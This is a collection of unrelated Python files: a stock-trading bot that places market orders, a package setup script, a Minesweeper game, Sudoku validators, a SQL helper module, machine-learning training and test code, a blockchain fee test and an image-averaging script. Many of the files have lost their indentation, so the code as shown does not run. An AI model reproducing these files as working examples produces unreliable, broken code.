# stocks.rename(columns={0:'Ticker'},inplace=True)
# print(stocks)
# print('')
# print(stocks['Ticker'])
##### EXECUTE A BATCH API CALL AND BUILD A DATAFRAME ################################
def chunks(lst,n):
''' yield succesive n-sized chunks from list '''
for i in range(0 ,len(lst), n):
yield lst[i:i+n]
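# e.g. list(chunks(['A','B','C','D','E'], 2)) -> [['A','B'], ['C','D'], ['E']];
# the IEX batch endpoint accepts up to 100 symbols per request, hence chunks of 100 below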
symbol_groups = list(chunks(stocks['Ticker'],100))
symbol_strings = []
for i in range(0, len(symbol_groups)):
symbol_strings.append(','.join(symbol_groups[i]))
########################## Create your dataset
hqm_columns = [
'Ticker',
'Price',
'Number of Shares to Buy',
'One-Year Price Return',
    'One-Year Return Percentile',
'Six-Month Price Return',
'Six-Month Return Percentile',
'Three-Month Price Return',
'Three-Month Return Percentile',
'One-Month Price Return',
'One-Month Return Percentile'
]
hqm_dataframe = pd.DataFrame(columns=hqm_columns)
for symbol_string in symbol_strings:
batch_api_call_url = f'https://sandbox.iexapis.com/stable/stock/market/batch?symbols={symbol_string}&types=price,stats&token={IEX_CLOUD_API_TOKEN}'
data = requests.get(batch_api_call_url).json()
for symbol in symbol_string.split(','):
hqm_dataframe = hqm_dataframe.append(
pd.Series(
[symbol,
data[symbol]['price'],
'n/a',
data[symbol]['stats']['year1ChangePercent'],
'n/a',
data[symbol]['stats']['month6ChangePercent'],
'n/a',
data[symbol]['stats']['month3ChangePercent'],
'n/a',
data[symbol]['stats']['month1ChangePercent'],
'n/a',
], index =hqm_columns),
ignore_index = True)
################### CALCULATE MOMENTUM PERCENTILES #########################
time_periods = [
'One-Year',
'Six-Month',
'Three-Month',
'One-Month'
]
hqm_dataframe.fillna(value=0.0, inplace=True)
for row in hqm_dataframe.index:
for time_period in time_periods:
change_col = f'{time_period} Price Return'
percentile_col = f'{time_period} Return Percentile'
a = hqm_dataframe[change_col]
b = hqm_dataframe.loc[row, change_col]
hqm_dataframe.loc[row, percentile_col] = score(a,b)
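        # score() is scipy's percentileofscore, e.g. score([1, 2, 3, 4], 3) == 75.0:
        # three quarters of the universe's returns lie at or below this stock's return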
##################3
from statistics import mean
for row in hqm_dataframe.index:
momentum_percentiles = []
for time_period in time_periods:
momentum_percentiles.append(hqm_dataframe.loc[row, f'{time_period} Return Percentile'])
hqm_dataframe.loc[row,'HQM Score'] = mean(momentum_percentiles)
############# select the top momentum stocks (top 5 here)
hqm_dataframe.sort_values('HQM Score', ascending = False, inplace=True)
hqm_dataframe = hqm_dataframe[:5]
hqm_dataframe.reset_index(inplace=True, drop=True)
# print(hqm_dataframe)
##### calcuate the number of shares to buy
position_size = float(portfolio_size)/len(hqm_dataframe.index)
for i in hqm_dataframe.index:
hqm_dataframe.loc[i,'Number of Shares to Buy']=math.floor(position_size/hqm_dataframe.loc[i,'Price'])
print(hqm_dataframe)
# buy the recommended values from hqm_dataframe.index
print('Alright lets start trading')
while now.hour<=14:
    now = datetime.now()  # refresh the clock so the end-of-day check below can actually trigger
    dataframes = []
    timeframe = 5  # timeframe in minutes to trade on (e.g. 1, 5, 15, 60)
days_back = 2
for symbol in hqm_dataframe.index:
'''
Place an order
price: float (LMT / STP LMT Only)
action: BUY / SELL / SHORT
ordertype : LMT / MKT / STP / STP LMT / STP TRAIL
timeinforce: GTC / DAY / IOC
outsideRegularTradingHour: True / False
stpPrice: float (STP / STP LMT Only)
trial_value: float (STP TRIAL Only)
trial_type: DOLLAR / PERCENTAGE (STP TRIAL Only)
'''
stock = hqm_dataframe['Ticker'][symbol]
quant = hqm_dataframe['Number of Shares to Buy'][symbol]
# print(quant)
        # fetch recent 5-minute bars for this ticker
        bars = wb.get_bars(stock=stock, interval='m5', count=int((390*days_back)/timeframe), extendTrading=1)
        dataframes.append((stock, bars))
# print(dataframes)
# print('')
for tup in dataframes:
stock, df = tup
df['MA20'] = df['close'].rolling(20).mean()
# df['MA50'] = df['close'].rolling(50).mean()
# df['rsi'] = talib.RSI(df["close"])
df['upper'] = df['MA20'] + 2*(df['close'].rolling(20).std())
df['lower'] = df['MA20'] - 2*(df['close'].rolling(20).std())
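        # classic 20-period Bollinger Bands: the logic below buys when the close drops
        # to or under the lower band and sells when it reaches the upper band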
# df['lowbuf'] = df['lower']*1.03
# df[['close','MA20','upper','lower','lowbuf']].plot(figsize=(16,6))
# plt.show()
#### lol the beginning of a crossover strategy
# if df['MA20'][-1]>df['MA50'][-1]:
# print('kk')
# print(df['lower'][-1]*1.03)
if df['close'][-1] <= df['lower'][-1]:
print(stock)
wb.place_order(stock=stock, action='BUY', orderType='MKT', enforce='DAY', quant=quant)
print('price',yf.get_live_price(stock),'lowerbound',df['lower'][-1])
print('long')
elif df['close'][-1]>= df['upper'][-1]:
            print(stock)
wb.place_order(stock=stock, action='SELL', orderType='MKT', enforce='DAY', quant=quant)
print('price',yf.get_live_price(stock),'upperbound',df['upper'][-1])
print('short')
# print(stock)
# print(df.tail())
# print('')
# check if closing time
if now.hour >= 14:
print('All done for today')
break
else:
time.sleep(90)
# for symbol in pos.index:
# '''
# Place an order
# price: float (LMT / STP LMT Only)
# action: BUY / SELL / SHORT
# ordertype : LMT / MKT / STP / STP LMT / STP TRAIL
# timeinforce: GTC / DAY / IOC
# outsideRegularTradingHour: True / False
# stpPrice: float (STP / STP LMT Only)
# trial_value: float (STP TRIAL Only)
# trial_type: DOLLAR / PERCENTAGE (STP TRIAL Only)
# '''
# # stock = hqm_dataframe['Ticker'][symbol]
# # quant = hqm_dataframe['Number of Shares to Buy'][symbol]
# try:
# wb.place_order(stock=stock, action='SELL', orderType='MKT', enforce='DAY', quant=quant)
# def get_current_orders(self):
# def get_positions(self):
# stock,df = dataframes
# print(stock)
# print(quant)
# # stock=None, tId=None, price=0, action='BUY', orderType='LMT', enforce='GTC', quant=0, outsideRegularTradingHour=True, stpPrice=None, trial_value=0, trial_type='DOLLAR')
# wb.cancel_all_orders()
### BEFORE TRADING START
# ### HANDLE DATAT Run this every minute
# ####### RUN STRATEGY
|
from setuptools import setup
try:
import enum # noqa
extra_requires = []
except ImportError:
extra_requires = ['enum34']
REQUIRES = ['marshmallow>=2.0.0'] + extra_requires
with open('README.md', 'r') as f:
readme = f.read()
with open('CHANGELOG', 'r') as f:
changelog = f.read()
if __name__ == '__main__':
setup(
name='marshmallow-enum',
version='1.5.1',
author='Alec Nikolas Reiter',
author_email='alecreiter@gmail.com',
description='Enum field for Marshmallow',
long_description=readme + '\n\n' + changelog,
long_description_content_type="text/markdown",
package_data={'': ['LICENSE', 'README.md', 'CHANGELOG']},
include_package_data=True,
license='MIT',
packages=['marshmallow_enum'],
install_requires=REQUIRES,
)
|
"""Class that defines the Mine Sweeper Game.
Author: Yuhuang Hu
Email : duguyue100@gmail.com
"""
from __future__ import print_function
from msboard import MSBoard
class MSGame(object):
"""Define a Mine Sweeper game."""
def __init__(self, board_width, board_height, num_mines,
port=5678, ip_add="127.0.0.1"):
"""The init function of Mine Sweeper Game.
Parameters
----------
board_width : int
the width of the board (> 0)
board_height : int
the height of the board (> 0)
num_mines : int
the number of mines, cannot be larger than
(board_width x board_height)
port : int
UDP port number, default is 5678
ip_add : string
the ip address for receiving the command,
default is localhost.
"""
if (board_width <= 0):
raise ValueError("the board width cannot be non-positive!")
else:
self.board_width = board_width
if (board_height <= 0):
raise ValueError("the board height cannot be non-positive!")
else:
self.board_height = board_height
if (num_mines >= (board_width*board_height)):
raise ValueError("The number of mines cannot be larger than "
"number of grids!")
else:
self.num_mines = num_mines
self.BUFFER_SIZE = 1024
self.move_types = ["click", "flag", "unflag", "question"]
self.init_new_game()
def init_new_game(self, with_tcp=False):
"""Init a new game.
        Attributes
----------
board : MSBoard
define a new board.
game_status : int
define the game status:
0: lose, 1: win, 2: playing
moves : int
how many moves carried out.
"""
self.board = self.create_board(self.board_width, self.board_height,
self.num_mines)
self.game_status = 2
self.num_moves = 0
self.move_history = []
def reset_game(self):
"""Reset game."""
self.init_new_game(with_tcp=False)
def create_board(self, board_width, board_height, num_mines):
"""Create a board by given parameters.
Parameters
----------
board_width : int
the width of the board (> 0)
board_height : int
the height of the board (> 0)
num_mines : int
the number of mines, cannot be larger than
(board_width x board_height)
Returns
-------
board : MSBoard
"""
return MSBoard(board_width, board_height, num_mines)
def check_move(self, move_type, move_x, move_y):
"""Check if a move is valid.
        If the move is not valid, raise a ValueError.
If the move is valid, then setup a dictionary for the game,
and update move counter.
        TODO: instead of raising, maybe end the game or coerce this into
        a valid move?
Parameters
----------
move_type : string
one of four move types:
"click", "flag", "unflag", "question"
move_x : int
X position of the move
move_y : int
Y position of the move
"""
if move_type not in self.move_types:
raise ValueError("This is not a valid move!")
if move_x < 0 or move_x >= self.board_width:
raise ValueError("This is not a valid X position of the move!")
if move_y < 0 or move_y >= self.board_height:
raise ValueError("This is not a valid Y position of the move!")
move_des = {}
move_des["move_type"] = move_type
move_des["move_x"] = move_x
move_des["move_y"] = move_y
self.num_moves += 1
return move_des
def play_move(self, move_type, move_x, move_y):
"""Updat board by a given move.
Parameters
----------
move_type : string
one of four move types:
"click", "flag", "unflag", "question"
move_x : int
X position of the move
move_y : int
Y position of the move
"""
# record the move
if self.game_status == 2:
self.move_history.append(self.check_move(move_type, move_x,
move_y))
else:
self.end_game()
# play the move, update the board
if move_type == "click":
self.board.click_field(move_x, move_y)
elif move_type == "flag":
self.board.flag_field(move_x, move_y)
elif move_type == "unflag":
self.board.unflag_field(move_x, move_y)
elif move_type == "question":
self.board.question_field(move_x, move_y)
# check the status, see if end the game
if self.board.check_board() == 0:
self.game_status = 0 # game loses
self.print_board()
self.end_game()
elif self.board.check_board() == 1:
self.game_status = 1 # game wins
self.print_board()
self.end_game()
elif self.board.check_board() == 2:
self.game_status = 2 # game continues
self.print_board()
def qplay(self, move_type, move_x, move_y):
"""Updat board by a given move.
Parameters
----------
move_type : string
one of four move types:
"click", "flag", "unflag", "question"
move_x : int
X position of the move
move_y : int
Y position of the move
"""
# play the move, update the board
if move_type == "click":
self.board.click_field(move_x, move_y)
elif move_type == "flag":
self.board.flag_field(move_x, move_y)
elif move_type == "unflag":
self.board.unflag_field(move_x, move_y)
elif move_type == "question":
self.board.question_field(move_x, move_y)
self.game_status = self.board.check_board()
return self.game_status
def print_board(self):
"""Print board."""
self.board.print_board()
def get_board(self):
"""Get board message."""
return self.board.board_msg()
def get_info_map(self):
"""Get info map."""
return self.board.info_map
def get_mine_map(self):
"""Get mine map."""
return self.board.mine_map
def end_game(self):
"""Settle the end game.
        TODO: handle some more exceptions.
"""
if self.game_status == 0:
pass
#print("[MESSAGE] YOU LOSE!")
elif self.game_status == 1:
print("[MESSAGE] YOU WIN!")
def parse_move(self, move_msg):
"""Parse a move from a string.
Parameters
----------
move_msg : string
a valid message should be in:
"[move type]: [X], [Y]"
Returns
-------
"""
# TODO: some condition check
type_idx = move_msg.index(":")
move_type = move_msg[:type_idx]
pos_idx = move_msg.index(",")
move_x = int(move_msg[type_idx+1:pos_idx])
move_y = int(move_msg[pos_idx+1:])
return move_type, move_x, move_y
def play_move_msg(self, move_msg):
"""Another play move function for move message.
Parameters
----------
move_msg : string
a valid message should be in:
"[move type]: [X], [Y]"
"""
move_type, move_x, move_y = self.parse_move(move_msg)
self.play_move(move_type, move_x, move_y)
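if __name__ == "__main__":
    # Minimal smoke test (illustrative sketch): it relies only on the MSBoard
    # interface used above and prints the board after each move.
    demo = MSGame(board_width=5, board_height=5, num_mines=3)
    demo.play_move("click", 2, 2)
    demo.play_move_msg("flag: 0, 0")
    print("status:", demo.game_status, "moves:", demo.num_moves)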
|
#%%
nboard = \
[[".",".",".",".","5",".",".","1","."],\
[".","4",".","3",".",".",".",".","."],\
[".",".",".",".",".","3",".",".","1"],\
["8",".",".",".",".",".",".","2","."],\
[".",".","2",".","7",".",".",".","."],\
[".","1","5",".",".",".",".",".","."],\
[".",".",".",".",".","2",".",".","."],\
[".","2",".","9",".",".",".",".","."],\
[".",".","4",".",".",".",".",".","."]]
# nboard = [[".",".","4",".",".",".","6","3","."] \
# ,[".",".",".",".",".",".",".",".","."] \
# ,["5",".",".",".",".",".",".","9","."] \
# ,[".",".",".","5","6",".",".",".","."],\
# ["4",".","3",".",".",".",".",".","1"],\
# [".",".",".","7",".",".",".",".","."],\
# [".",".",".","5",".",".",".",".","."],\
# [".",".",".",".",".",".",".",".","."],\
# [".",".",".",".",".",".",".",".","."]]
board = \
[["5","3",".",".","7",".",".",".","."] \
,["6",".",".","1","9","5",".",".","."] \
,[".","9","8",".",".",".",".","6","."] \
,["8",".",".",".","6",".",".",".","3"] \
,["4",".",".","8",".","3",".",".","1"] \
,["7",".",".",".","2",".",".",".","6"] \
,[".","6",".",".",".",".","2","8","."] \
,[".",".",".","4","1","9",".",".","5"] \
,[".",".",".",".","8",".",".","7","9"]]
def checkboard(board):
for i in range(len(board)):
for j in range(len(board[i])):
if board[i][j] == ".":
board[i][j] = 0
else:
board[i][j] = int(board[i][j])
return(checkrows(board) and checkcols(board) and checkgrid(board))
checkboard(nboard)
# %%
def checkline(row):
for i in row:
if i > 0:
if i in row[row.index(i)+1:]:
#print(row,"False")
return False
return True
def checkrows(board):
for i in range(len(board)):
if not checkline(board[i]):
#print("row", board[i])
return False
return True
def checkcols(board):
for j in range(len(board[0])):
if not checkline([board[i][j] for i in range(len(board))]):
#print("col", board[i])
return False
return True
def checkgrid(board):
subgrids = []
for box_i in range(3):
for box_j in range(3):
subgrid = []
for i in range(3):
for j in range(3):
subgrid.append(board[3*box_i + i][3*box_j + j])
subgrids.append(subgrid)
#print(subgrid)
if not checkline(subgrid):
return False
return True
checkgrid(nboard)
# %%
def isValidSudoku(board):
"""
:type board: List[List[str]]
:rtype: bool
"""
# init data
rows = [{} for i in range(9)]
columns = [{} for i in range(9)]
boxes = [{} for i in range(9)]
# validate a board
for i in range(9):
for j in range(9):
num = board[i][j]
if num != '.':
num = int(num)
box_index = (i // 3 ) * 3 + j // 3
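                # e.g. cell (i=4, j=7): (4 // 3) * 3 + 7 // 3 = 3 + 2 = 5, the middle-right 3x3 box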
# keep the current cell value
rows[i][num] = rows[i].get(num, 0) + 1
columns[j][num] = columns[j].get(num, 0) + 1
boxes[box_index][num] = boxes[box_index].get(num, 0) + 1
# check if this value has been already seen before
if rows[i][num] > 1 or columns[j][num] > 1 or boxes[box_index][num] > 1:
return False
return True
nboard = \
[[".",".",".",".","5",".",".","1","."],\
[".","4",".","3",".",".",".",".","."],\
[".",".",".",".",".","3",".",".","1"],\
["8",".",".",".",".",".",".","2","."],\
[".",".","2",".","7",".",".",".","."],\
[".","1","5",".",".",".",".",".","."],\
[".",".",".",".",".","2",".",".","."],\
[".","2",".","9",".",".",".",".","."],\
[".",".","4",".",".",".",".",".","."]]
print(isValidSudoku(nboard))
# %%
|
# Copyright 2015 Google Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
# in compliance with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software distributed under the License
# is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
# or implied. See the License for the specific language governing permissions and limitations under
# the License.
"""Helper functions for %%sql modules."""
from __future__ import absolute_import
from __future__ import unicode_literals
from builtins import str
from past.builtins import basestring
from builtins import object
import shlex
from . import _sql_statement
from . import _utils
# It would be nice to be able to inherit from Python module but AFAICT that is not possible.
# So this just wraps a bunch of static helpers.
class SqlModule(object):
""" A container for SqlStatements defined together and able to reference each other. """
@staticmethod
def _get_sql_args(parser, args=None):
""" Parse a set of %%sql arguments or get the default value of the arguments.
Args:
parser: the argument parser to use.
args: the argument flags. May be a string or a list. If omitted the empty string is used so
we can get the default values for the arguments. These are all used to override the
arg parser. Alternatively args may be a dictionary, in which case it overrides the
default values from the arg parser.
Returns:
A dictionary of argument names and values.
"""
overrides = None
if args is None:
tokens = []
elif isinstance(args, basestring):
command_line = ' '.join(args.split('\n'))
tokens = shlex.split(command_line)
elif isinstance(args, dict):
overrides = args
tokens = []
else:
tokens = args
args = {} if parser is None else vars(parser.parse_args(tokens))
if overrides:
args.update(overrides)
# Don't return any args that are None as we don't want to expand to 'None'
return {arg: value for arg, value in args.items() if value is not None}
@staticmethod
def get_default_query_from_module(module):
""" Given a %%sql module return the default (last) query for the module.
Args:
module: the %%sql module.
Returns:
The default query associated with this module.
"""
return _utils.get_default_query_from_module(module)
@staticmethod
def get_sql_statement_with_environment(item, args=None):
""" Given a SQLStatement, string or module plus command line args or a dictionary,
return a SqlStatement and final dictionary for variable resolution.
Args:
item: a SqlStatement, %%sql module, or string containing a query.
args: a string of command line arguments or a dictionary of values.
Returns:
A SqlStatement for the query or module, plus a dictionary of variable values to use.
"""
if isinstance(item, basestring):
item = _sql_statement.SqlStatement(item)
elif not isinstance(item, _sql_statement.SqlStatement):
item = SqlModule.get_default_query_from_module(item)
if not item:
raise Exception('Expected a SQL statement or module but got %s' % str(item))
env = {}
if item.module:
env.update(item.module.__dict__)
parser = env.get(_utils._SQL_MODULE_ARGPARSE, None)
if parser:
args = SqlModule._get_sql_args(parser, args=args)
else:
args = None
if isinstance(args, dict):
env.update(args)
return item, env
@staticmethod
def expand(sql, args=None):
""" Expand a SqlStatement, query string or SqlModule with a set of arguments.
Args:
sql: a SqlStatement, %%sql module, or string containing a query.
args: a string of command line arguments or a dictionary of values. If a string, it is
passed to the argument parser for the SqlModule associated with the SqlStatement or
SqlModule. If a dictionary, it is used to override any default arguments from the
argument parser. If the sql argument is a string then args must be None or a dictionary
as in this case there is no associated argument parser.
Returns:
The expanded SQL, list of referenced scripts, and list of referenced external tables.
"""
sql, args = SqlModule.get_sql_statement_with_environment(sql, args)
return _sql_statement.SqlStatement.format(sql._sql, args)
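# --- Illustrative sketch (not part of the original module) ---
# SqlModule._get_sql_args flattens newlines and tokenizes string arguments with
# shlex before handing them to the argparse parser; the lines below only show
# that tokenization step on a hypothetical argument string.
if __name__ == '__main__':
  example_args = '--project my_project\n--limit 10'
  print(shlex.split(' '.join(example_args.split('\n'))))
  # ['--project', 'my_project', '--limit', '10']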
|
from __future__ import print_function
import sys, os
sys.path.insert(1, os.path.join("..","..",".."))
import h2o
from h2o.automl import H2OAutoML
from tests import pyunit_utils as pu
from _automl_utils import import_dataset
def check_ignore_cols_automl(models,names,x,y):
models = sum(models.as_data_frame().values.tolist(),[])
for model in models:
if "StackedEnsemble" in model:
continue
else:
assert set(h2o.get_model(model).params["ignored_columns"]["actual"]) == set(names) - {y} - set(x), \
"ignored columns are not honored for model " + model
def test_columns_not_in_x_and_y_are_ignored():
ds = import_dataset()
#Use same project_name so we add to leaderboard for each run
aml = H2OAutoML(max_models=2, stopping_rounds=3, stopping_tolerance=0.001, project_name="aml1")
print("AutoML with x as a str list, train, valid, and test")
x = ["AGE", "RACE", "DPROS"]
y = ds.target
names = ds.train.names
aml.train(x=x, y=y, training_frame=ds.train, validation_frame=ds.valid, leaderboard_frame=ds.test)
print("AutoML leaderboard")
print(aml.leaderboard)
models = aml.leaderboard["model_id"]
check_ignore_cols_automl(models, names, x, y)
print("AutoML with x and y as col indexes, train, valid, and test")
aml.train(x=[2, 3, 4], y=1, training_frame=ds.train, validation_frame=ds.valid, leaderboard_frame=ds.test)
print("AutoML leaderboard")
print(aml.leaderboard)
models = aml.leaderboard["model_id"]
check_ignore_cols_automl(models, names, x, y)
print("AutoML with x as a str list, y as a col index, train, valid, and test")
aml.train(x=x, y=1, training_frame=ds.train, validation_frame=ds.valid, leaderboard_frame=ds.test)
print("AutoML leaderboard")
print(aml.leaderboard)
models = aml.leaderboard["model_id"]
check_ignore_cols_automl(models, names, x, y)
print("AutoML with x as col indexes, y as a str, train, valid, and test")
aml.train(x=[2,3,4], y=y, training_frame=ds.train, validation_frame=ds.valid, leaderboard_frame=ds.test)
print("AutoML leaderboard")
print(aml.leaderboard)
models = aml.leaderboard["model_id"]
check_ignore_cols_automl(models, names, x, y)
pu.run_tests([
test_columns_not_in_x_and_y_are_ignored
])
|
"""Universal vocoder"""
from typing import List
import torch
import torch.nn as nn
import torch.nn.functional as F
from tqdm import tqdm
from torch import Tensor
from torch.nn.utils.rnn import pad_sequence, pack_padded_sequence, pad_packed_sequence
class Vocoder(nn.Module):
"""Universal vocoding"""
def __init__(
self,
sample_rate,
frames_per_sample,
frames_per_slice,
mel_channels,
conditioning_channels,
embedding_dim,
rnn_channels,
fc_channels,
bits,
hop_length
):
super().__init__()
self.sample_rate = sample_rate
self.frames_per_slice = frames_per_slice
self.pad = (frames_per_sample - frames_per_slice) // 2
self.rnn_channels = rnn_channels
self.quantization_channels = 2 ** bits
self.hop_length = hop_length
self.rnn1 = nn.GRU(
mel_channels, conditioning_channels, num_layers=2, batch_first=True, bidirectional=True
)
self.embedding = nn.Embedding(self.quantization_channels, embedding_dim)
self.rnn2 = nn.GRU(embedding_dim + 2 * conditioning_channels, rnn_channels, batch_first=True)
self.fc1 = nn.Linear(rnn_channels, fc_channels)
self.fc2 = nn.Linear(fc_channels, self.quantization_channels)
def forward(self, wavs, mels):
"""Generate waveform from mel spectrogram with teacher-forcing."""
mel_embs, _ = self.rnn1(mels)
mel_embs = mel_embs.transpose(1, 2)
mel_embs = mel_embs[:, :, self.pad : self.pad + self.frames_per_slice]
conditions = F.interpolate(mel_embs, scale_factor=float(self.hop_length))
conditions = conditions.transpose(1, 2)
wav_embs = self.embedding(wavs)
wav_outs, _ = self.rnn2(torch.cat((wav_embs, conditions), dim=2))
wav_outs = F.relu(self.fc1(wav_outs))
wav_outs = self.fc2(wav_outs)
return wav_outs
@torch.jit.export
def generate(self, mels: List[Tensor]) -> List[Tensor]:
"""Generate waveform from mel spectrogram.
Args:
mels: list of tensor of shape (mel_len, mel_channels)
Returns:
wavs: list of tensor of shape (wav_len)
"""
# mels: List[(mel_len, mel_channels), ...]
batch_size = len(mels)
device = mels[0].device
mel_lens = [len(mel) for mel in mels]
wav_lens = [mel_len * self.hop_length for mel_len in mel_lens]
max_mel_len = max(mel_lens)
max_wav_len = max_mel_len * self.hop_length
pad_mels = pad_sequence(mels, batch_first=True)
pack_mels = pack_padded_sequence(
pad_mels, torch.tensor(mel_lens), batch_first=True, enforce_sorted=False
)
pack_mel_embs, _ = self.rnn1(pack_mels)
mel_embs, _ = pad_packed_sequence(pack_mel_embs, batch_first=True)
# mel_embs: (batch, embedding_dim, max_mel_len)
mel_embs = mel_embs.transpose(1, 2)
# conditions: (batch, embedding_dim, max_wav_len)
conditions = F.interpolate(mel_embs, scale_factor=float(self.hop_length))
# conditions: (batch, max_wav_len, embedding_dim)
conditions = conditions.transpose(1, 2)
hid = torch.zeros(1, batch_size, self.rnn_channels, device=device)
wav = torch.full(
(batch_size,), self.quantization_channels // 2, dtype=torch.long, device=device,
)
wavs = torch.empty(batch_size, max_wav_len, dtype=torch.float, device=device,)
for i, condition in enumerate(tqdm(torch.unbind(conditions, dim=1))):
wav_emb = self.embedding(wav)
wav_rnn_input = torch.cat((wav_emb, condition), dim=1).unsqueeze(1)
_, hid = self.rnn2(wav_rnn_input, hid)
logit = F.relu(self.fc1(hid.squeeze(0)))
logit = self.fc2(logit)
posterior = F.softmax(logit, dim=1)
wav = torch.multinomial(posterior, 1).squeeze(1)
wavs[:, i] = 2 * wav / (self.quantization_channels - 1.0) - 1.0
mu = self.quantization_channels - 1
wavs = torch.true_divide(torch.sign(wavs), mu) * (
(1 + mu) ** torch.abs(wavs) - 1
)
wavs = [
wav[:length] for wav, length in zip(torch.unbind(wavs, dim=0), wav_lens)
]
return wavs
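# Hedged reference sketch (not part of the original class): the inverse mu-law
# expansion applied at the end of generate(), written as a standalone helper.
def _mu_law_expand(x: Tensor, quantization_channels: int) -> Tensor:
    """Map mu-law companded values in [-1, 1] back to linear amplitude."""
    mu = quantization_channels - 1
    return torch.sign(x) / mu * ((1 + mu) ** torch.abs(x) - 1)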
|
#!/usr/bin/env python3
from test_framework.authproxy import JSONRPCException
from test_framework.test_framework import ElysiumTestFramework
from test_framework.util import assert_raises_message
class ElysiumPropertyCreationFeeTest(ElysiumTestFramework):
def get_new_address(self, default_balance = 0):
addr = self.nodes[0].getnewaddress()
if default_balance > 0:
self.nodes[0].sendtoaddress(addr, default_balance)
self.nodes[0].generate(1)
self.sync_all()
return addr
def test(self, balance = 1, ecosystem = 1, amount = None, expected_error = None):
addr = self.get_new_address(balance)
operator = self.nodes[0].elysium_sendissuancemanaged
options = [addr, ecosystem, 1, 0, "", "", "Foo", "", ""]
if amount is not None:
operator = self.nodes[0].elysium_sendissuancefixed
options.append(amount)
if expected_error is None:
operator(*options)
self.nodes[0].generate(1)
self.sync_all()
else:
assert_raises_message(
JSONRPCException,
expected_error,
operator,
*options)
def test_insufficient(self, balance = 1, ecosystem = 1, amount = None):
self.test(balance, ecosystem, amount, 'fees may not be sufficient')
def run_test(self):
super().run_test()
creation_fee_start_block = 500
        # before the creation fee is activated, all property types should be creatable with a low fee.
self.test(ecosystem = 1)
self.test(ecosystem = 1, amount = "10000")
self.test(ecosystem = 2)
self.test(ecosystem = 2, amount = "10000")
        # make sure the property creation fee is activated
self.nodes[0].generate(creation_fee_start_block - self.nodes[0].getblockcount())
        # after activation, 100 FIRO is required to create a main ecosystem property
self.test_insufficient(ecosystem = 1)
self.test_insufficient(ecosystem = 1, amount = "10000")
        # test ecosystem properties should still be creatable with a low fee
self.test(ecosystem = 2)
self.test(ecosystem = 2, amount = "10000")
        # creating a main ecosystem property with the 100 FIRO fee should succeed
self.test(balance = 101, ecosystem = 1)
self.test(balance = 101, ecosystem = 1, amount = "10000")
if __name__ == '__main__':
ElysiumPropertyCreationFeeTest().main()
|
import cv2
import numpy as np
from os import listdir
from os.path import isfile, join
screens_path = "/Users/andrewfinke/Library/Application Support/loggercli/screens/"
paths = [join(screens_path, f) for f in listdir(screens_path) if isfile(join(screens_path, f)) and ".png" in f]
combined_image = None
for index, path in enumerate(paths):
image = cv2.imread(path)
if combined_image is None:
combined_image = np.zeros(image.shape)
combined_image += image
print("{} / {}".format(index + 1, len(paths)))
result = combined_image / len(paths)
cv2.imwrite("result.png", result)
|
'''
AUTHOR :li peng cheng
DATE :2021/08/10 21:58
'''
import pandas as pd
import numpy as np
from torch.utils.data import TensorDataset, DataLoader
import torch.optim as optim
import torchtext
import torch
from collections import OrderedDict, Counter
from handle_text import *
from text_att_birnn import text_att_birnn
from gensim.models import Word2Vec
maxlen = 15
batch_size = 128
vocab_size = None
hidden_size = 128
class_num = 17
bidirection = True
embed_size = 50
epochs = 10
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
# vocab = pd.read_csv('train_20wan.txt',header=None) #dataframe
# train = Counter(OrderedDict(vocab.values)) #dict
# vocab = torchtext.vocab.Vocab(train) #vocabulary
w2v = Word2Vec.load('./embedding_model/word2vec_model_8iter_sg1.model')
print('model load success')
train = pd.read_csv('fenci.txt', header=None)[0:160000]  # training sentences; the longest one has 54 tokens
print('fenci.txt load success')
# len_distribution = Counter(train.apply(lambda x:len(x.iloc[1].split()),axis=1))
# train_x, train_y = get_sequence(vocab, train)  # train_x: list of np.array, train_y: true class labels
# train_x, train_y = get_and_pad_sequence(w2v, train, maxlen)  # train_x: list of np.array, train_y: true class labels
train_x, train_y = get_pretrain_pad_seq(w2v.wv.index2word, train, maxlen)  # map tokens to vocabulary indices
train_y = np.array(train_y)
# train_x = pad_sequence(train_x, maxlen)
train_x, train_y, test_x, test_y = split_data(train_x, train_y, 0.8)
# load the training and test datasets
train_dataset = TensorDataset(torch.LongTensor(train_x), torch.LongTensor(train_y))
test_dataset = TensorDataset(torch.LongTensor(test_x), torch.LongTensor(test_y))
# train_dataset = TensorDataset(torch.FloatTensor(train_x), torch.LongTensor(train_y))
# test_dataset = TensorDataset(torch.FloatTensor(test_x), torch.LongTensor(test_y))
train_loader = DataLoader(train_dataset, batch_size=batch_size, shuffle=True, drop_last=True)
test_loader = DataLoader(test_dataset, batch_size=batch_size, shuffle=True, drop_last=True)
pretrain = get_pretrain_embedding() #numpy
model = text_att_birnn(batch_size, embed_size, class_num,
bidirection, hidden_size, maxlen, len(w2v.wv.vocab), device, torch.tensor(pretrain))
model= model.to(device)
optim = optim.Adam(model.parameters(), lr=0.002,weight_decay=0.01)
loss = torch.nn.CrossEntropyLoss(reduction='sum',weight=torch.tensor([1.0,1,1,1,1,0,1,1,1,1,1,0,1,1,1,1,1]).to(device))
print(model.state_dict())
print('train_x shape:', train_x.shape) #(80000, 15)
print('train_y shape:', train_y.shape) #(80000,)
print('test_x shape:', test_x.shape)
print('test_y shape:', test_y.shape)
print('start training....')
for epoch in range(epochs):
model.train()
total_loss = 0
total_acc = 0
b = int(len(train_x) / batch_size)
for iter, (x, y) in enumerate(train_loader):
# print(x,y)
optim.zero_grad()
out = model(x.to(device))
l = loss(out, y.to(device))
l.backward()
optim.step()
total_loss += l.data
acc = caculate_acc(out.cpu().detach().numpy(), y.numpy())
total_acc += acc
if iter % 50 ==0:
print('Epoch %d. iter %d. loss is %f acc is %f' % (epoch, iter, l.data, acc))
print('---------------Epoch %d. total loss is %f, total acc is %f----------------' % (epoch, total_loss, total_acc/b))
test_acc = 0
test_loss = 0
model.eval()
b = len(test_x)
for iter, (x, y) in enumerate(test_loader):
# print(x,y)
out = model(x.to(device))
l = loss(out, y.to(device))
test_loss += l.data
test_acc += caculate_test_acc(out.cpu().detach().numpy(), y.numpy())
print('---------------Test dataset epoch %d. total loss is %f, total acc is %f----------------' % (epoch, test_loss, test_acc/b))
|
#!/bin/python
# python-twitter docs
# https://python-twitter.readthedocs.io/en/latest/twitter.html
# Requires a json configuration file called quine_reply.config like this:
# {
# "api_key": "",
